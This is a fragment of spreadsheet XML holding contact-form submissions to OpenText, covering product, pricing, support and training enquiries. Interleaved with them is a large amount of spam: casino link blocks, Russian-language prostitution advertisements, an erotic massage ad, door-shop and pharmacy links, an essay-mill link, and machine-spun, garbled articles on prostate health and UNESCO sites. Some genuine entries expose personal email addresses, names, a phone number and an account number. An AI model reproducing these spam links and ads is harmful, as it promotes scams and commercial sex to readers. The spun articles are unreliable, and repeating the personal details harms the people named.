&lt;a href="http://casinousaonlinelist.com/"&gt;casino games slots&lt;/a&gt; _x000D_
free casino games and poker _x000D_
[url=http://playslotscasino888.com/]online casino slots[/url] _x000D_
best us casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casino games free</t>
  </si>
  <si>
    <t>Hello Team_x000D_
_x000D_
 _x000D_
_x000D_
This is Prashanth Nagula. I am a Software professional based out of New Zealand, with over 11 years of experience in the IT industry. I partner with businesses and prospective clients from various industries. It is my goal to help as many businesses as I can to grow and flourish by connecting with prospective clients by passing on potential business leads which can turn into projects._x000D_
_x000D_
 _x000D_
_x000D_
I have a prospective public sector  client - in Australia,  who are looking for a "Web Content Management System" (WCMS)  platform to manage its portfolio of websites. Client's intent is to implement a contemporary, central WCMS and to rationalise its portfolio of websites._x000D_
_x000D_
 _x000D_
_x000D_
Current Situation_x000D_
_x000D_
 _x000D_
_x000D_
Currently, client  operates 18 different websites and utilises a variety of different content management systems, including Expression Engine, Craft CMS and Wordpress._x000D_
_x000D_
 _x000D_
_x000D_
The client's principal website  is powered by Expression Engine, contains over 2,000 individual pages and serves over 3.3 million page views annually._x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Specific high-level aims of the procurement are as follows:_x000D_
_x000D_
 _x000D_
_x000D_
a) The solution will be robust. The new WCMS solution will be fast, reliable, secure and scalable; it will provide near-100% uptime, failover redundancy, backup and recovery, ensuring that client is able to meet its obligations for accessibility, business continuity, data storage and archiving._x000D_
_x000D_
 _x000D_
_x000D_
b) The solution will enable a contemporary front-end user experience. The new WCMS solution will enable client  to publish responsive, ‘mobile first’ websites that meet modern day user expectations, including the provision of rich media content, powerful search functionality, universal accessibility, social media interactivity and device agnosticism._x000D_
_x000D_
 _x000D_
_x000D_
c) The solution will enable central administration of multiple websites via a user-friendly back-end interface for client's staff. The new WCMS solution will enable client to operate its portfolio of web</t>
  </si>
  <si>
    <t>Want to know more about the opentext, and need some training from the ShangHai(China) office.</t>
  </si>
  <si>
    <t>casino games list _x000D_
[url=http://casinousaonlinelist.com/]casino games list[/url] _x000D_
new usa online casinos _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
top rated free online casino games _x000D_
[url=http://playslotscasino888.com/]online casino[/url] _x000D_
online casino real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
best us casinos online</t>
  </si>
  <si>
    <t>Hello _x000D_
Law firm shalom._x000D_
_x000D_
I will contact you for installation of encase._x000D_
_x000D_
I have a dongle key._x000D_
_x000D_
How do I install on a new PC?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir, Our budget season will end within this week. We need a document management solution by next year. This has to be budgeted. As such, I need an indicative cost and hope to receive quotation from your end asap, until tomorrow. Let me know the email address where I can send the template for the costing. I will also send our business requirements. Thanks._x000D_
</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://casinousaonlinelist.com/]free casino games and poker[/url] _x000D_
top rated free online casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games slots&lt;/a&gt; _x000D_
play casinos _x000D_
[url=http://playslotscasino888.com/]online casino real money[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>We are interested in a ballpark quote for an on-premises Fax server solution for 50 users in one of our departments sending approx. 2k per faxes per month.  We would also like to see a demo this week if possible.  Thank you  -Marshall</t>
  </si>
  <si>
    <t>Our current rightfax solution is dying and we need to update/replace the systems.  I would like to talk to someone about the options.</t>
  </si>
  <si>
    <t>I sent emails to your company regarding a Encase certificate bootcamp. However, no reply has been received. Can you reply ?</t>
  </si>
  <si>
    <t>online casinos 2016 _x000D_
[url=http://casinousaonlinelist.com/]new usa online casinos[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
online casinos 2016 _x000D_
[url=http://playslotscasino888.com/]casino online gambling[/url] _x000D_
best us casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;best us casinos online&lt;/a&gt; _x000D_
casino online free</t>
  </si>
  <si>
    <t>[URL=https://sexosochi.vip]Проститутки сочи[/URL] _x000D_
[URL=https://sexonsk.online]проститутки новосибирска[/URL] _x000D_
[URL=https://sexosurgut.mobi]Проститутки сургута[/URL] _x000D_
[URL=http://nskxxx.club]Проститутки новосибирск[/URL] _x000D_
[URL=https://nsksex.vip]проститутки новосибирск[/URL] _x000D_
[URL=http://prostitutkivsochi.info]проститутки сочи[/URL] _x000D_
[URL=https://sex.sochi-xxx.net]проститутки сочи[/URL] _x000D_
[URL=https://sochidosug.info]проститутки сочи[/URL] _x000D_
Вы можете выбрать девушку, которая сама приедет вам. Если вам это не удобно, сайт предлагает анкеты проституток Сочи, которые имеют апартаменты. В зависимости от ваших предпочтений, вы можете воспользоваться поиском по категориям. Кроме того, анкеты индивидуалок с настоящими фотографиями помечены на сайте специальной подписью. _x000D_
Дешевые проститутки Новосибирска ждут в гости тех, кто ищет развлечений, но имеет не очень много средств. Каждая из них – красива и эффектна. Любая из ночных бабочек данного раздела с пониманием относится к тяжелым экономическим временам, и выставила наиболее доступную стоимость за свои услуги.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Visitors to Sydney room can find many questionnaires lady Lillian of any age and nationality performing body rub massage in the city Midtown West. _x000D_
 _x000D_
Girls Melissa are able not only to give pleasure in this way, but also to the strong semi-gentlemen. Specialists Jennifer perform japanese a massage that will produce a male a vivid impression. _x000D_
Prices for tantric massage depends on qualification Women and the skills that she possesses. Before making a choice, carefully study the prices for services and customer feedback about the work of one or another masseur specialist. We are sure that the search for a real professional masseur will be crowned with success and you will be satisfied with the quality of our services. Women Kimberly are skilled workers in their field and they will help you relax after a hard day. _x000D_
 _x000D_
 _x000D_
 _x000D_
Massage room NY. : [url=https://nude.massage-nyc.com]nude massage[/url] _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ,_x000D_
I wanted to know whether it's mandatory for a customer to have a SAP system in order to use the OpenText for SAP suite. I do understand that it would be of more value,  but at the same time wanted to know whether a customer could still use the OpenText suite for SAP without having a SAP system or SAP landscape._x000D_
Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">[URL="https://ustanovkamontazhmetallicheskikhdverei.wordpress.com/2018/08/03/приобрести-стальную-входную-дверь/"]Приобрести стальную входную дверь[/URL]_x000D_
[URL="https://mezhkomnatnyedveriiurkasdeform302289829.wordpress.com/2018/08/03/двери-из-массива/"]Двери из массива[/URL]_x000D_
[URL="https://otdelkadvernykhotkosov.home.blog/2018/08/03/двери-магна-купить-в-минске/"]Двери магна купить в минске[/URL]_x000D_
[URL="https://metaliukstriumf.home.blog/2018/08/05/металюкс-стандарт/"]Металюкс стандарт[/URL]_x000D_
[URL="https://petlidvernye.wordpress.com/петли-дверные/"]Петли дверные[/URL]_x000D_
</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://casinousaonlinelist.com/]casino online for fun[/url] _x000D_
casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casino online subtitrat _x000D_
[url=http://playslotscasino888.com/]vegas casino games[/url] _x000D_
play casino games online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games roulette&lt;/a&gt; _x000D_
new usa online casinos 2017</t>
  </si>
  <si>
    <t>Need the instalation driver of Open Text Imaging Enterprise Scan 9.7 program. I lost the instalation CD.</t>
  </si>
  <si>
    <t>Looking for [url=http://casino.i-online-casino.org/]casino[/url]?Check out top free [url=http://www.i-online-casino.org/]online casino[/url] bonus offers at [url=http://www.i-online-casino.org/Slotocash-Casino.html]slotocash casino[/url]</t>
  </si>
  <si>
    <t>My FMs are not going through to my email since last Wednesday I have not been getting them to my always used email jenny34@comcast.net through my Worldspan/Travelport booking system. Account 733465</t>
  </si>
  <si>
    <t>want to register for data base</t>
  </si>
  <si>
    <t>casino g _x000D_
[url=http://casinousaonlinelist.com/]casino online gambling[/url] _x000D_
online casino real money _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games&lt;/a&gt; _x000D_
new usa online casinos _x000D_
[url=http://playslotscasino888.com/]new usa online casinos 2017[/url] _x000D_
casino games roulette _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games&lt;/a&gt; _x000D_
free casino games and poker</t>
  </si>
  <si>
    <t>We currently are running eDOCS DM 5.3.1_x000D_
_x000D_
We have a user who would like to copy their Workspace to another user._x000D_
_x000D_
Please provide directions on how to do so._x000D_
_x000D_
Thanks,_x000D_
Ravi</t>
  </si>
  <si>
    <t>casino games free _x000D_
[url=http://casinousaonlinelist.com/]new usa online casinos 2017[/url] _x000D_
play casinos _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casino games roulette _x000D_
[url=http://playslotscasino888.com/]casino online for fun[/url] _x000D_
casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;pogo casino slots&lt;/a&gt; _x000D_
best us casinos online</t>
  </si>
  <si>
    <t>Hello, I have questions regarding OpenText Extended ECM for Salesforce. We're new to OpenText and would like to know how this can integrate with our Salesforce and SAP Business One products.</t>
  </si>
  <si>
    <t>Requesting more information about Streamserve product.</t>
  </si>
  <si>
    <t>I am having problems getting access to the mysupport section.  I get to the verify email section, I click the link in the email and log in.  the page says the account is verified and OpenText Support representative with confirmation.  I never get the email. Thanks in advance.</t>
  </si>
  <si>
    <t>Hi Team, _x000D_
_x000D_
My name is Laurence Adams, I’m one of the TVS Specialists at Computacenter. _x000D_
_x000D_
Part of my role is working with Deutsche Bank on their software renewals, this is encompassed in a contract we won with them in 2016. Part of the information we double check and note for them is if they (Deutsche Bank) have direct terms with you (the vendor). _x000D_
_x000D_
Can I ask that you confirm this, coming back to me ASAP?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Gostaria de saber se vocês trabalham com o trafego de dados da Ticket e Sodexo</t>
  </si>
  <si>
    <t>free casino games and poker _x000D_
[url=http://casinousaonlinelist.com/]casinos online[/url] _x000D_
casino online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
online casino slots _x000D_
[url=http://playslotscasino888.com/]new usa online casinos 2017[/url] _x000D_
top rated free online casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I worked for Vignette in Maidenhead in England, Uk and am tracking down my pension from that time. Could you direct my enquiry to the relevant department so that I may find it? Best  regards, Amanda Morgan  ( Moyes ) </t>
  </si>
  <si>
    <t xml:space="preserve">1. I requested for access to support, I got a confirmation but I still cannot login (I did not request to full support access).  Can you also please check if T Rowe Price has support contract? _x000D_
_x000D_
2. I would like to inquire here are my questions: _x000D_
_x000D_
We have on going project to migrate Exstream DBs from SQL server to AWS server. _x000D_
We would like to know if Exstream will work on AWS server ? _x000D_
or can  OpenText Exstream support AWS DB services Aurora, DynamoDB, AWS3, MySQL, PostgresSQL or RDS? _x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">Submitted a request for a training quote for the annual passport last Wednesday August 8, followed up with an email on August 10. Still have not received this quote. I need this quote ASAP please. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I wanted to find out how to get access to the Knowledge Center for VIM/ ICC/ Enterprise Scan? Kindly let me know the steps to grant access._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Hello._x000D_
Our client, BRD Groupe Societe Generale - Romania wants to purchase Captiva software._x000D_
Please, redirect us to a Romanian distributor if there is one or send us a quote._x000D_
_x000D_
Best regards, </t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://casinousaonlinelist.com/]casino online application[/url] _x000D_
casino games real money _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
pogo casino slots _x000D_
[url=http://playslotscasino888.com/]casino online for fun[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to try the RightFax express on prem._x000D_
_x000D_
thanks_x000D_
</t>
  </si>
  <si>
    <t>I have over 50 licenses for OpenText Exceed version 15.  Using your website's search, I did not find any reference or information about Exceed v16.  Please forward to me the v16 information.  Also, I would appreciate the reason to upgrade from v15 to v16 of OpenText Exceed.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi team,_x000D_
_x000D_
I am Mike Gilligan, the Head of Business Development at Data Markets Inc (dmi)._x000D_
_x000D_
We have some exciting things we are working on here at dmi this year.  We are currently running a pilot with one of the larger global Business Intelligence software companies and we are interested to explore how we could work with you to add additional value to your customers as well._x000D_
_x000D_
Our research has shown that many businesses look for third party data to supplement their analytics that they get from their business intelligence software. We have built a Data Marketplace along with a large catalog of data vendors and products that we can open up within Business Analytics platforms and allow end users to find such external data and assess, purchase, then incorporate it seamlessly into their analytics. This pilot will be building out this function in depth and it would be great to get you involved._x000D_
_x000D_
Do you have time this week to touch base and discuss this opportunity further?_x000D_
_x000D_
Best regards,_x000D_
Mike_x000D_
_x000D_
_x000D_
Michael  Gilligan    _x000D_
Director, Business Development_x000D_
Data Markets Inc | (203) 530 3992_x000D_
</t>
  </si>
  <si>
    <t>I'd like some general pricing for the website content management product you offer (TeamSite).  Do you have a version that runs over a DB2 database?</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://casinousaonlinelist.com/]vegas casino games[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
casino games free online _x000D_
[url=http://playslotscasino888.com/]casino online free[/url] _x000D_
best us casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games real money&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>Hello_x000D_
Who is the contact for potential field placements (unpaid) within your Kitchener-Waterloo location?_x000D_
Thank you kindly</t>
  </si>
  <si>
    <t>Hallo Opentext Team,_x000D_
_x000D_
Wir suchen derzeit nach einem Dokumentenmanagementsystem._x000D_
 _x000D_
Könnten Sie bitte folgende Fragen zu Ihrem Tool für unsere schnelle Einschätzung beantworten:_x000D_
 _x000D_
1. Haben Sie eine On-Premise-Lösung?_x000D_
2. Kann Opentext über Outlook relevante Projektordner und deren Transaktionsstatus einsehen?_x000D_
3. Ist es für kundenspezifische Bedürfnisse anpassbar?_x000D_
4. Ist es möglich, extrahierte Daten automatisch aus dem Dokument in ERP / CRM zu importieren?_x000D_
5. Wie ist die aktuelle Fehlerrate aufgrund der Datenextraktion?_x000D_
6. Wie hoch ist der Preis für Ihr Tool (Basiskonfiguration)? Einmahlig? Pro Monat/Benutzer?_x000D_
 _x000D_
Nach einer kurzen Überprüfung werden wir Sie für weitere Details kontaktieren._x000D_
 _x000D_
Vielen Dank im Voraus._x000D_
Regards_x000D_
Saqib</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, I would like to inquire as to what the latest version of Open Text Exceed is? Also, how could I obtain a trial of the latest version? Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
_x000D_
im Rahmen meiner Bachelorarbeit untersuche ich den Markt von Anbietern von Bewerbermanagementsystemen. Hierzu hätte ich an Sie ein paar Fragen: _x000D_
- Gibt es von Ihnen ein einzelnes Modul Bewerbermanagement?_x000D_
- wenn ja, ist dies für den Mittelstand geeignet? unser Unternehmen hat 1100 Mitarbeiter. _x000D_
- handelt es sich um ein webbasiertes System oder eine Software für das eigene Rechenzentrum? _x000D_
_x000D_
Vielen Dank und freundliche Grüße, _x000D_
Carina Abel </t>
  </si>
  <si>
    <t>Do we have any whitepaper on how we can migrate from On-Prem RightFax to a SAAS based solution like Fax2Mail? Any case studies on how difficult that migration can be and any specific points we should consider ? Also any cost estimates which you can provide for SAAS based solution?</t>
  </si>
  <si>
    <t>* Title:_x000D_
Security vulnerability found in one of your products_x000D_
_x000D_
* Subject:_x000D_
Hello,_x000D_
_x000D_
I'm Technical Leader within Orange Cyberdefense company, specialised in security and especially penetration testing._x000D_
Two of our auditors (Elias ISSA and Andrei DUMITRESCU) found a security vulnerability in one of your products: Infofusion Integration Center._x000D_
We would like to share with you the details in order you could provide a patch._x000D_
_x000D_
For your information, we requested a CVE ID (MITRE)._x000D_
_x000D_
Feel free to contact me (by mail preferably),_x000D_
_x000D_
Best Regards,_x000D_
Nicolas KERSCHENBAUM</t>
  </si>
  <si>
    <t xml:space="preserve">[URL="https://obivkairemontdverei551223254.wordpress.com/2018/08/03/белая-эмаль-двери-межкомнатные/"]Белая эмаль двери межкомнатные[/URL]_x000D_
[URL="https://mekhanizmydvernyezashchelki.wordpress.com/2018/08/02/приобрести-стальную-входную-дверь/"]Приобрести стальную входную дверь[/URL]_x000D_
[URL="https://wordpress.com/post/belaiaemaldverimezhkomnatnye.wordpress.com/17"]Двери стеклянные[/URL]_x000D_
[URL="https://dveripvkh946864583.wordpress.com/2018/08/03/каталог-дверей-металюкс/"]Каталог дверей металюкс[/URL]_x000D_
[URL="https://ruchkirazdelnyedliavkhodnykhdverei.wordpress.com/2018/08/03/фурнитура-для-входных-дверей/"]Фурнитура для входных дверей[/URL]_x000D_
</t>
  </si>
  <si>
    <t>I am normalizing some Open Text parts for our online system and had a few questions. I'm hoping someone could jump on a quick call with me to review. thanks!</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am following up on an inquiry submitted about two weeks ago. We are wondering if your product, the T8u USB 3.0 Forensic Bridge, contains any volatile and/or non-volatile memory. If so, do you provide a certificate of volatility for this product?_x000D_
Thank you.</t>
  </si>
  <si>
    <t>[url=http://doxycycline-cheapbuy.site/]doxycycline-cheapbuy.site.ankor[/url] &lt;a href="http://onlinebuycytotec.site/"&gt;onlinebuycytotec.site.ankor&lt;/a&gt;</t>
  </si>
  <si>
    <t>I've sent e-mail requests and left VM for a call back but no response. anyone there?</t>
  </si>
  <si>
    <t xml:space="preserve">Please discontinue my Hightail account immediately. I today received a renewal notice, but I cannot access my account. Your system will not recognize my email, which is strange since you emailed me at the same address. </t>
  </si>
  <si>
    <t>How do I verify a person's EnCE status?</t>
  </si>
  <si>
    <t>Dear Sirs, we already run OpenText Enterprise Scanning, Our main account is within Europe. My question is who would be our main contact (state side) for the technical capabilities of your product suite, Kindest regards, Simon</t>
  </si>
  <si>
    <t>SB</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Dans le cadre d'une étude de marché sur les outils GED, nous souhaiterions avoir des information sur la solution GED que vous proposez ( fonctionnalités, coût)._x000D_
_x000D_
Merci d'avance</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Good Afternoon,_x000D_
_x000D_
Please could you please advise from which versions of Myriad/ Brava IXL are compatible with which operating systems. In particular our Customer has Myriad Version 8.1 and is looking to upgrade to Windows 10_x000D_
_x000D_
If you have any further enquiries, or require any further information, please do not hesitate to contact me._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Kind Regards_x000D_
Tracy_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
gibt es eine Möglichkeit für eine Teststellung von OpenText Email Archiving for Microsoft Exchange, um dieses für eine mögliche Kundenanfrage zu evaluieren?_x000D_
In diesem Fall geht es um eine Umgebung mit einem Exchange 2016 Server mit ca. 120 Benutzern und der Anforderung, daß die Archivierung onsite erfolgt, nicht irgendwo außehalb / in der Cloud._x000D_
Mit freundlichen Grüßen_x000D_
Martina Dippold</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
 _x000D_
As you may be aware, the Merck Group (“Merck”) has agreed to sell its global Consumer Health (“CH”) business to Procter &amp; Gamble (“P&amp;G”). Our client Merck KGaA located at (Frankfurter Str. 250, 64293 Darmstadt, Germany) has therefore instructed us (SoftwareONE Deutschland GmbH, Neckargartacher Strasse 90, 74080 Heilbronn, Germany) to evaluate software and services contracts for specific software suppliers. We have now reached a stage where Merck and P&amp;G have a common understanding and agreed at a high level on the next steps while currently building the detailed carve-out plan._x000D_
 _x000D_
At this very moment I need to connect with Opentext to provide you:_x000D_
- details on the planned carve-out strategy for the Opentext software_x000D_
- insight on the legal and contractual requirements that may lead to further clarifying actions on your end_x000D_
 _x000D_
Would you please let me know who is in charge for the customer to have 30 minutes within the next business days in order for me to setup a meeting so we can connect and discuss the above further._x000D_
_x000D_
A delegation of authority letter can be provided subsequently._x000D_
 _x000D_
Thank you._x000D_
Martin Fienhold</t>
  </si>
  <si>
    <t>the download for the ebook on your Campaign Digital Manufacturing does not work .it gives error that it needs Industry but there is no such input field</t>
  </si>
  <si>
    <t>Discussion for Documentum opportunity and other relates solution for a project</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I've run into a license limitation i StreamServe vers. 5.6.2 at a customer. _x000D_
When using the 'PDFin' function to import PDF drawings from an archive into PageOut, the Control Center log states: 'Fatal error: License not present: externfilter'._x000D_
On behalf of the customer, I'm interested in knowing the cost of this plug-in._x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>We have a requirement from customer, that they want to Backup their old SAP Data using 3rd Party tool, which they will check later for audit purpose.</t>
  </si>
  <si>
    <t>Dear Support, _x000D_
I lost my partner access. I would need to be able to download documents, search for incidents... Please let me know what is needed to get back this granting._x000D_
Thx in advance, _x000D_
Vincent</t>
  </si>
  <si>
    <t>Hello,_x000D_
My name is Jennifer Storch and I represent ReclaiMe Data Recovery Company. We work with data recovery cases of any complexity, deal with most file system types, RAID arrays, NAS devices and so on._x000D_
One of our customers asks us to record a file .e01, so, I would like to ask if we can do it legally._x000D_
Looking forward to your answer._x000D_
Best wishes,_x000D_
Jennifer Storch</t>
  </si>
  <si>
    <t xml:space="preserve">Request for Quotation_x000D_
PROVISION FOR OPEN TEXT CONTENT SERVER (LIVELINK) INSTALLATION WITH SUPPORT &amp; MAINTENANCE_x000D_
_x000D_
SCOPE OF WORK_x000D_
_x000D_
The scope of works for Provision of Livelink Software Upgrade, Support, &amp; Maintenance License Renewal shall include but not limited to the following:_x000D_
_x000D_
•	Open Text Content Server upgrade (formerly known as Livelink)_x000D_
_x000D_
•	Installation of additional Enterprise Content Server Modules_x000D_
_x000D_
•	Yearly Support &amp; Maintenance of Content Server with Additional Content Server Modules_x000D_
_x000D_
o	Content Suite Platform Standard Named Users Maintenance_x000D_
o	Brava! for Content Suite add-on: Thumbnails Module Maintenance_x000D_
o	Level 2 CAD Annotation Add On Brava Module Maintenance_x000D_
o	Management of Change Maintenance_x000D_
o	Remote Cache Maintenance_x000D_
o	Transmittal Management Maintenance_x000D_
o	Brava! for Content Suite - Docs only - Base Module KIT Maintenance_x000D_
o	Brava! for Content Suite add-on: Publish/Redact Module Maintenance_x000D_
o	Automatic Document Numbering Maintenance_x000D_
o	Brava! for Content Suite Client with add-on: Batch Print_x000D_
o	Module (Single User) Maintenance_x000D_
o	ECM Suite, Content Lifecycle Management (Enterprise Process Services Edition) Full Named Users Maintenance_x000D_
o	ActiveView Maintenance_x000D_
o	WebReports Maintenance_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Our customer has a Documentum system. We would like to know whom we should contact to get a quotation for 2nd or 3rd level maintenance and support the Documentum system.</t>
  </si>
  <si>
    <t xml:space="preserve">Need help in collaboration of Brava with custom application </t>
  </si>
  <si>
    <t>Guild Trustee Services (GuildSuper) have a Hightail account but I am unable to log into Opentext.  The email address we use for Hightail was yvanderbeek@guildtrusteeservices.com.au_x000D_
We need to be able to access the service.  Can you please assist?</t>
  </si>
  <si>
    <t>Explore if we can extend current documentum setup for Schroders HKG  to global and what are new features and options available._x000D_
_x000D_
Query is little urgent as we need to make decision this week.</t>
  </si>
  <si>
    <t>The men's prostate is the central part of a male's reproductive :. It secretes fluids that help the transportation and activation of sperm. The prostate gland is located just in front of the rectum, below the bladder and all around the urethra. When there is prostate problem, it is almost always really miserable and inconvenient for that patient as his urinary product is directly affected. _x000D_
 _x000D_
The common prostate health conditions are prostate infection, enlarged prostate and cancer of prostate. _x000D_
 _x000D_
 _x000D_
 _x000D_
Prostate infection, also called prostatitis, is the most common prostate-related symptom in men younger than 55 years. Infections from the men's prostate are classified into four types - acute bacterial prostatitis, chronic bacterial prostatitis, chronic abacterial prostatitis and prosttodynia. _x000D_
 _x000D_
Acute bacterial prostatitis could be the least common coming from all varieties of prostate infection. It is caused by bacteria found in the large intestines or urinary tract. Patients may experience fever, chills, body aches, back pains and urination problems. This condition is treated through the use of antibiotics or non-steroid anti-inflammatory drugs (NSAIDs) to alleviate the swelling. _x000D_
 _x000D_
Chronic bacterial prostatitis is really a condition of the particular defect within the gland and also the persistence presence of bacteria inside the urinary tract. It can be caused by trauma to the urinary tract or by infections via other regions of the body. A patient may feel testicular pain, small of the back pains and urination problems. Although it is uncommon, it is usually treated by removal with the prostate defect then the employment antibiotics and NSAIDs to take care of the soreness. _x000D_
 _x000D_
Non-bacterial prostatitis is the reason approximately 90% of all prostatitis cases; however, researchers have not to ascertain the cause of these conditions. Some researchers think that chronic non-bacterial prostatitis occur as a consequence of unknown infectious agents while ot</t>
  </si>
  <si>
    <t xml:space="preserve">UNESCO business heritage blogs to check out_x000D_
_x000D_
more likely, You have already been to a UNESCO populace historical past online business in the united states with no knowledge of it. of which Griswoldian summer vacation a vacation in the rare Canyon? The twelfth grade sector day at escape lounge in Philadelphia? the school take an excursion to your institution of va? what do you know! that's three on your bottom line. brand new wii console alleviate this moment. it really is harvest every one 23, deliberately as well unintentionally._x000D_
_x000D_
for over 40 days, a new not educational, traditional and interpersonal organizing will be approximately 200 manhood affirms were definitely conserving, preserving in addition featuring the best legacy of music points in this field. eventually matter, the corporation has got crowned 1,073 online businesses in the 170 close to. of such, 832 are usually emotional, 206 are natural and furthermore 35 are combining both styles. one particular tried ones array extremely: all Whale planet connected El Vizcafound ino south america ; one particular neighborhoods for fortified churches with Transylvania; the particular Engelsberg Ironworks during Sweden were a part of the class of 1993, with regard to example. but also the assorted sites what's more meet the convention's upmost qualification regarding obtaining excellent general value for money._x000D_
_x000D_
"It's a ravishing difficulty the good ways of life of the universe, replied Mechtild Rssler, The paris, europe, based upon movie director with the distribution in heirloom and also the UNESCO entire town. "selection shifting buyer on generations to come,_x000D_
_x000D_
malta allegations the highest connected with sites (53), But land is not really too about. as opposed to to rub this item by, truthfully we tend to unfavorable reactions two extra than japan, rapidly farm land of the increasing Sun's personal innovator start by a few centuries._x000D_
_x000D_
the u. s supported anyone tradition conference rolling around in its </t>
  </si>
  <si>
    <t xml:space="preserve">REQUEST FOR QUOTATION_x000D_
PROVISION FOR OPEN TEXT CONTENT SERVER (LIVELINK) INSTALLATION WITH SUPPORT &amp; MAINTENANCE_x000D_
_x000D_
SCOPE OF WORK_x000D_
_x000D_
The scope of works for Provision of Livelink Software Upgrade, Support, &amp; Maintenance License Renewal shall include but not limited to the following:_x000D_
_x000D_
•	Open Text Content Server upgrade (formerly known as Livelink)_x000D_
_x000D_
•	Installation of additional Enterprise Content Server Modules_x000D_
_x000D_
•	Yearly Support &amp; Maintenance of Content Server with Additional Content Server Modules_x000D_
_x000D_
o	Content Suite Platform Standard Named Users Maintenance_x000D_
o	Brava! for Content Suite add-on: Thumbnails Module Maintenance_x000D_
o	Level 2 CAD Annotation Add On Brava Module Maintenance_x000D_
o	Management of Change Maintenance_x000D_
o	Remote Cache Maintenance_x000D_
o	Transmittal Management Maintenance_x000D_
o	Brava! for Content Suite - Docs only - Base Module KIT Maintenance_x000D_
o	Brava! for Content Suite add-on: Publish/Redact Module Maintenance_x000D_
o	Automatic Document Numbering Maintenance_x000D_
o	Brava! for Content Suite Client with add-on: Batch Print_x000D_
o	Module (Single User) Maintenance_x000D_
o	ECM Suite, Content Lifecycle Management (Enterprise Process Services Edition) Full Named Users Maintenance_x000D_
o	ActiveView Maintenance_x000D_
o	WebReports Maintenance_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>You have a chance to[url=https://essay-zone.com/where-to-buy-a-college-essay/]buy essay cheap[/url] and fast exactly on time</t>
  </si>
  <si>
    <t>Logistics Data</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Partnership dept. _x000D_
I would like to make a partnership as ( Cybersecurity systems and solutions + IT Audit / Risk service ) with me to part of my success story in South yemen ( Hadramout ) with my new own business there DATA LINK during a few next months . _x000D_
_x000D_
Best Regards. </t>
  </si>
  <si>
    <t>Sent faxes are being distorted</t>
  </si>
  <si>
    <t xml:space="preserve">[URL="https://obivkairemontdverei551223254.wordpress.com/2018/08/03/фурнитура-для-входных-дверей/"]Фурнитура для входных дверей[/URL]_x000D_
[URL="https://medvedevik.wordpress.com/2018/08/03/конструкция-металлических-дверей/"]Конструкция металлических дверей[/URL]_x000D_
[URL="https://wordpress.com/post/dverimezhkomnatnyemassivolkhipostavy5.home.blog/23"]Замок накладной[/URL]_x000D_
[URL="https://ti840pjof.yolasite.com"]Металлические с терморазрывом[/URL]_x000D_
[URL="https://zamenazamkov.wordpress.com/2018/08/03/ламинированное-двп/"]Ламинированное двп[/URL]_x000D_
</t>
  </si>
  <si>
